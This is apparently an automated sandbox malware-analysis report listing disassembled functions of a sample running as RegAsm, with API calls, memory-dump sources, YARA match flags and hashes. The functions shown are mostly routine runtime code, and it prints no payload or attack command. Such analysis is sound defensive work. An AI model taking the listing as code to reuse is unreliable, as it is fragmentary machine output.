                                                                                                                                                                                                                                                                                                  Function 6C833DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C7FF20E,?), ref: 6C833DF5
                                                                                                                                                                                                                                                                                                  • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C7FF20E,00000000,?), ref: 6C833DFC
                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C833E06
                                                                                                                                                                                                                                                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C833E0E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CC00: GetCurrentProcess.KERNEL32(?,?,6C7F31A7), ref: 6C82CC0D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C7F31A7), ref: 6C82CC16
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: dd04e901801cc4f88a2e51ad1a539ae2a66ee8a8b56103e9383e67c44f338d87
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d71e5e8d97d4ca82b300baf92fa1cb18083b6b9d35e0fafd66b53273b4902b1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd04e901801cc4f88a2e51ad1a539ae2a66ee8a8b56103e9383e67c44f338d87
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80F05EB15002186BEB11AB54DC89DBF376DDB46628F040430FD0857741E635BD5586F6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004102A0 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00427398,00000000,?,00000000,00000000), ref: 004102AE
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00427398,00000000,?,00000000,00000000), ref: 004102B5
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00427398,?,00427398,00000000,?,00000000,00000000), ref: 004102C1
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004102ED
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1243822799-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f2ff721cb424942451b347fe5570341ae3898732b1430379c704d4f1e29be0c
                                                                                                                                                                                                                                                                                                  • Instruction ID: fccc40c8ee202386385d4aa97dc71e834c2259e96c23f56b48720401643fd0a5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2ff721cb424942451b347fe5570341ae3898732b1430379c704d4f1e29be0c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FF09AB6900038BBD710ABDAAC099BFB7FDEF48B02F00114AFA45D2180E6784950D3B4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00406890 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,?), ref: 004068DE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 004069B8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: ik@
                                                                                                                                                                                                                                                                                                  • API String ID: 2574300362-1217583681
                                                                                                                                                                                                                                                                                                  • Opcode ID: e788d5e094678ecae44c960a4ed3759e63225d774ba99121b3081e89e8601206
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f3496bdad06a6a9dd2fd0b74cbe6c79fbafd73ffc8673f8c463a512e0444e0e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e788d5e094678ecae44c960a4ed3759e63225d774ba99121b3081e89e8601206
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96417CB17006059BEB20CF69D8807ABF3E8AF85315F15457AD84EDB781E639EC20CB95
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8485B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C8485D3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C848725
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                                  • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                                                  • Opcode ID: c615b4786a7bd9001a74d24f5336abf916d431f52e4aa10f78160fecb3a04056
                                                                                                                                                                                                                                                                                                  • Instruction ID: 99d121f31d37d4441b249fc4e98bc6687ed44deda016a42f33a3147eeb070ebf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c615b4786a7bd9001a74d24f5336abf916d431f52e4aa10f78160fecb3a04056
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A35187746006498FC751CF18C298A5ABBF1BF4A318F18C99AD8599BB52C335EC85CFD2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040F830 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040F8A5
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040F8F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F740: std::_Xinvalid_argument.LIBCPMT ref: 0040F75A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                                                                  • API String ID: 2304785028-2556327735
                                                                                                                                                                                                                                                                                                  • Opcode ID: c255d135583dce274128fd494f2d6070698c16afa004b4f817087435439aa828
                                                                                                                                                                                                                                                                                                  • Instruction ID: e5889aef85042e50390ca67c1054f8a8dd149cfb0848e60e67da1512f7abb49f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c255d135583dce274128fd494f2d6070698c16afa004b4f817087435439aa828
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B31E6337146109BD734AE5CA8809AAF7E9EB95720720453FF441D7BC0C779AC4883A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7FBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C7FBDEB
                                                                                                                                                                                                                                                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7FBE8F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                                                  • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                                                                                                  • Opcode ID: e5b7ff1c8faa6ac38313a719e4095a4e49699537b1a101dffa96fff35975d36f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2aee2c4f44d19d23d8c24850e375ff80d7a574b6adac69a4f9a4139283e6595f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5b7ff1c8faa6ac38313a719e4095a4e49699537b1a101dffa96fff35975d36f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE41A271509745CFC711DF38C5C199BB7E8AF8A348F008A2DF9A557711D730E9468B92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040F520 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040F536
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: std::exception::exception.LIBCMT ref: 0041F8A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: __CxxThrowException@8.LIBCMT ref: 0041F8BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: std::exception::exception.LIBCMT ref: 0041F8CB
                                                                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 0040F56F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • invalid string position, xrefs: 0040F531
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                                                                                                                                                  • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                                                                                  • Opcode ID: 48a4cae87a4ab2e71c5eac51e236123e1b103342487daff29e10b7d13fee6958
                                                                                                                                                                                                                                                                                                  • Instruction ID: 74e90254372bc2a628a56474e33649711b48212279b82ac7473317494fbbca9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a4cae87a4ab2e71c5eac51e236123e1b103342487daff29e10b7d13fee6958
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC012B31300210ABC734DD6CED8055AB3AAEBC5750B24493FE091DBF82C674EC4A83A8
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C833CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C833D19
                                                                                                                                                                                                                                                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C833D6C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                                                  • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b6df80922d8fc8b5b5648ae8a9718b92c46cfb70e43a7c43fbcb9865747b652
                                                                                                                                                                                                                                                                                                  • Instruction ID: d6029fc4c51c537bd092cf79f012cee555e426e1c45c40dd8b87832f1992eacb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b6df80922d8fc8b5b5648ae8a9718b92c46cfb70e43a7c43fbcb9865747b652
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8113B31E0465897DB229F9DC9144FDB375EF86219B44B629DC4897601FB30A9C5C3D0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C856DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C856E22
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C856E3F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C856E1D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                                                  • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d7b9e42db77952f365a57a0f3f681a22dd00ec1e23c81c728e50bdc4e4c331d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 61f86f98b0d57dbcac57c5e3724d7671752db124057f32f6348e1bfc3cc31fc7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d7b9e42db77952f365a57a0f3f681a22dd00ec1e23c81c728e50bdc4e4c331d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18F0F03430A2408ADA328A69CE5CA8937725B2222CF540975C40846BA1F720A926CAF2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C809E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C809EEF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                  • String ID: Infinity$NaN
                                                                                                                                                                                                                                                                                                  • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1dee37954d23ffaa45616bae941451009af353b963a60dbec3c1f4ffec433f85
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b9fce2d80a61312b10ba2f8c6e212f93c2505af5b3b47e6128ed9c9374a1ff1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dee37954d23ffaa45616bae941451009af353b963a60dbec3c1f4ffec433f85
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF08C70605251CAEB328B5ADF4D7983B71AB2730EF210E35D5080AB40F375698ACAE2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C80BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C80BEE3
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C80BEF5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                                                                                                                                                  • String ID: cryptbase.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4137859361-1262567842
                                                                                                                                                                                                                                                                                                  • Opcode ID: 913352bdbd065b59e8add741f2f705e6c9375600bc5e7b76b1ffe34b918ebada
